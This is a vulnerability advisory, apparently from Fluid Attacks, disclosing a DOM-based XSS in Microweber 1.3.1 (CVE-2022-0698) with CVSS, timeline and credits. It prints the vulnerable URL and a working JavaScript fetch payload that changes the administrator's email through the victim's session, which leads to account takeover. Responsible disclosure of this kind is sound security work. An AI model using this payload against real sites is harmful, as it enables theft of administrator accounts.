Microweber 1.3.1 - DOM XSS to Account Takeover

Summary

NameMicroweber 1.3.1 - DOM XSS to Account Takeover
Code nameGarrix
ProductMicroweber
Affected versionsVersion 1.3.1
StatePrivate
Release date2022-09-19

Vulnerability

KindDOM-Based cross-site scripting (XSS)
Rule371. DOM-Based cross-site scripting (XSS)
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3 Base Score8.8
Exploit availableYes
CVE ID(s)CVE-2022-0698

Description

Microweber version 1.3.1 allows an unauthenticated user to perform an account takeover via an XSS on the 'select-file' parameter of the following URL: http://cbelloatfluid.com/admin/view:modules/load_module:files#select-file=http://cbelloatfluid.com/userfiles/media/default/ovaa-checklist.txt. It is possible to obtain administrative accounts through a malicious link.

Vulnerability

The XSS present in Microweber 1.3.1, allows an unauthenticated remote attacker to perform an Account Takeover. To trigger this vulnerability, we will need to send the following malicious link to an administrator in order to hack their account:

In the PAYLOAD field we will put the following malicious JS code:

fetch('http://cbelloatfluid.com/api/user/1',{
    method:'POST',
    credentials:'include',
    headers:{
        'Content-type':'application/x-www-form-urlencoded;charset%3dUTF-8'
    },
    body:'id%3d1%26_method%3dPATCH%26username%3dadmin%26email%3dattacker%40fluidattacks.com%26phone%3d\r\n'
})

Exploitation

To exploit this vulnerability, a malicious URL must be sent to the administrator of the Microweber instance. Once the administrator enters the link, we will change the email address associated with their account to one that is under our control.

normal

AccountTakeover

hacked

Our security police

We have reserved the CVE-2022-0698 to refer to this issue from now on.

System Information

  • Version: Microweber 1.3.1

  • Operating System: GNU/Linux

  • Web Server: Apache

  • PHP Version: 8.1.9

  • Database and version: MySQL

Mitigation

An updated version of Microweber is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page https://github.com/microweber/microweber

Timeline

Time-lapse-logo

2022-09-05

Vulnerability discovered.

Time-lapse-logo

2022-09-05

Vendor contacted.

Time-lapse-logo

2022-09-19

Vendor replied acknowledging the report.

Time-lapse-logo

2022-09-19

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-09-19

Vulnerability patched.

Time-lapse-logo

2022-09-19

Public Disclosure.